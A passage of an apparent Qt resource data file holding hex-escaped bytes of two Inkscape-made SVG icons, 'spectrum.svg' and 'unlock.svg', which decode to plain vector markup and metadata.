\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x36\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x31\x36\x20\x31\x36\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x73\x70\x65\x63\x74\x72\x75\x6d\x2e\x73\x76\x67\x22\x3e\x0a\
\x20\x20\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\
\x64\x76\x69\x65\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x62\
\x61\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\x6f\
\x6c\x6f\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\x20\
\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\
\x23\x36\x36\x36\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\
\x72\x64\x65\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x70\x61\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x70\x61\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\
\x6d\x3d\x22\x34\x35\x2e\x32\x35\x34\x38\x33\x34\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\x22\
\x34\x2e\x30\x30\x30\x37\x32\x32\x32\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\x22\x37\x2e\x39\
\x35\x35\x30\x31\x30\x35\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2d\x75\
\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\x65\x6e\x74\x2d\
\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\
\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\x3d\x22\x66\x61\
\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\x69\x64\x74\x68\x3d\
\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x68\x65\x69\x67\
\x68\x74\x3d\x22\x31\x30\x31\x35\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x78\
\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\x3d\x22\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\
\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\x65\x64\x3d\x22\
\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\x22\x74\x72\x75\x65\
\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\x73\x0a\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x35\x37\x38\x38\x22\x20\
\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\x61\
\x35\x37\x39\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\
\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\
\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\
\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\
\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\
\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\
\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\
\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x20\x2f\
\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\x3a\x57\x6f\x72\
\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\
\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x0a\
\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\
\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\
\x72\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\
\x65\x72\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\
\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\
\x3d\x22\x45\x62\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\
\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x38\x30\x62\x33\x66\x66\
\x3b\x66\x69\x6c\x6c\x2d\x72\x75\x6c\x65\x3a\x65\x76\x65\x6e\x6f\
\x64\x64\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\x37\x64\x37\x64\x37\
\x64\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x31\
\x70\x78\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\x63\x61\
\x70\x3a\x62\x75\x74\x74\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\
\x6e\x65\x6a\x6f\x69\x6e\x3a\x6d\x69\x74\x65\x72\x3b\x73\x74\x72\
\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x64\x3d\x22\x4d\x20\x2d\x30\x2e\x31\x37\
\x36\x37\x37\x36\x37\x2c\x31\x33\x2e\x31\x39\x33\x36\x37\x20\x43\
\x20\x2d\x30\x2e\x31\x35\x34\x36\x37\x39\x36\x31\x2c\x31\x33\x2e\
\x30\x36\x31\x30\x38\x38\x20\x30\x2e\x37\x39\x35\x34\x39\x35\x31\
\x32\x2c\x37\x2e\x32\x37\x31\x36\x35\x30\x37\x20\x30\x2e\x37\x39\
\x35\x34\x39\x35\x31\x32\x2c\x37\x2e\x32\x37\x31\x36\x35\x30\x37\
\x20\x4c\x20\x31\x2e\x36\x31\x33\x30\x38\x37\x33\x2c\x31\x32\x2e\
\x38\x31\x38\x30\x31\x39\x20\x32\x2e\x39\x36\x31\x30\x30\x39\x36\
\x2c\x38\x2e\x34\x36\x34\x38\x39\x33\x34\x20\x34\x2e\x30\x32\x31\
\x36\x36\x39\x38\x2c\x31\x33\x2e\x33\x32\x36\x32\x35\x32\x20\x35\
\x2e\x35\x30\x32\x31\x37\x34\x36\x2c\x37\x2e\x37\x31\x33\x35\x39\
\x32\x34\x20\x36\x2e\x32\x37\x35\x35\x37\x32\x37\x2c\x31\x32\x2e\
\x31\x39\x39\x33\x30\x31\x20\x38\x2e\x32\x32\x30\x31\x31\x36\x33\
\x2c\x30\x2e\x35\x30\x39\x39\x34\x32\x30\x36\x20\x31\x30\x2e\x33\
\x34\x31\x34\x33\x37\x2c\x31\x33\x2e\x31\x37\x31\x35\x37\x33\x20\
\x6c\x20\x31\x2e\x36\x33\x35\x31\x38\x34\x2c\x2d\x35\x2e\x31\x37\
\x30\x37\x31\x38\x35\x20\x30\x2e\x38\x36\x31\x37\x38\x37\x2c\x34\
\x2e\x31\x35\x34\x32\x35\x32\x35\x20\x30\x2e\x37\x37\x33\x33\x39\
\x37\x2c\x2d\x33\x2e\x39\x39\x39\x35\x37\x32\x39\x20\x30\x2e\x36\
\x36\x32\x39\x31\x33\x2c\x34\x2e\x38\x31\x37\x31\x36\x34\x39\x20\
\x31\x2e\x30\x33\x38\x35\x36\x33\x2c\x2d\x35\x2e\x35\x39\x30\x35\
\x36\x32\x39\x20\x30\x2e\x37\x39\x35\x34\x39\x35\x2c\x35\x2e\x38\
\x31\x31\x35\x33\x33\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x70\x61\x74\x68\x34\x36\x33\x31\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x6f\x6e\
\x6e\x65\x63\x74\x6f\x72\x2d\x63\x75\x72\x76\x61\x74\x75\x72\x65\
\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\
\x70\x6f\x64\x69\x3a\x6e\x6f\x64\x65\x74\x79\x70\x65\x73\x3d\x22\
\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x22\
\x20\x2f\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\
\x3e\x0a\
\x00\x00\x0d\x0c\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x36\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x31\x36\x20\x31\x36\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x75\x6e\x6c\x6f\x63\x6b\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\
\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\
\x69\x65\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\
\x65\x22\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\
\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\
\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\
\x36\x36\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\
\x65\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\
\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\
\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\
\x22\x33\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x63\x78\x3d\x22\x32\x2e\x34\x33\x38\x35\x38\x34\x22\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\
\x79\x3d\x22\x38\x2e\x34\x36\x32\x32\x30\x35\x39\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\
\x6d\x65\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\
\x72\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\
\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\
\x69\x64\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\
\x77\x69\x64\x74\x68\x3d\x22\x31\x34\x34\x30\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x38\x34\x34\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\
\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\
\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\
\x7a\x65\x64\x3d\x22\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\
\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\
\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x31\
\x30\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\x61\x74\
\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\x61\x64\
\x61\x74\x61\x31\x33\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\
\x3a\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\
\x57\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\
\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\
\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\
\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\
\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\
\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\
\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x3c\x2f\x63\x63\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\
\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\
\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\
\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x33\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\
\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x33\x22\x20\x2f\x3e\
\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\
\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\
\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\
\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\x65\x63\x74\x0a\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x77\x69\x64\x74\x68\x3a\x31\x2e\x32\x39\x35\x35\x32\x35\x30\
\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x72\x65\
\x63\x74\x32\x36\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x77\x69\x64\
\x74\x68\x3d\x22\x31\x33\x2e\x31\x38\x37\x35\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x39\x2e\x34\x31\
\x30\x39\x36\x32\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x3d\
\x22\x31\x2e\x35\x33\x31\x32\x35\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x79\x3d\x22\x36\x2e\x31\x38\x32\x37\x38\x37\x39\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x72\x79\x3d\x22\x31\x2e\x36\x36\x38\x39\
\x33\x39\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x70\x61\x74\x68\
\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\
\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\
\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\
\x30\x30\x35\x35\x64\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\
\x64\x74\x68\x3a\x32\x2e\x33\x37\x38\x39\x39\x39\x39\x35\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\
\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\
\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x39\x35\x35\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x74\
\x79\x70\x65\x3d\x22\x61\x72\x63\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x78\x3d\x22\x38\x2e\
